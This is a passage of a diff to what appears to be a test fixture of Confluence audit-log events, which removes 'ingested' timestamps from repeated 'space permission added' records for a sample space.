user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2398,7 +2373,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837478890Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.821Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2498,7 +2472,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837479909Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.811Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2598,7 +2571,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837480843Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.796Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2691,7 +2663,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837481833Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.785Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2791,7 +2762,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837482827Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.777Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2891,7 +2861,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837483823Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.770Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -2991,7 +2960,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837484745Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.756Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3084,7 +3052,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837485809Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.751Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3184,7 +3151,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837486801Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.744Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3284,7 +3250,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837487829Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.728Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3384,7 +3349,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837489044Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.713Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3477,7 +3441,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837490080Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.705Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3577,7 +3540,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837491086Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.688Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3677,7 +3639,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837491992Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.675Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3777,7 +3738,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837492880Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.668Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3870,7 +3830,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837493796Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.654Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3970,7 +3929,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837494809Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.644Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4070,7 +4028,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837495796Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.639Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4170,7 +4127,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837496963Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.634Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4270,7 +4226,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837497903Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.628Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4370,7 +4325,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837498774Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.618Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4463,7 +4417,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837499719Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.612Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4563,7 +4516,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837500676Z", "original": 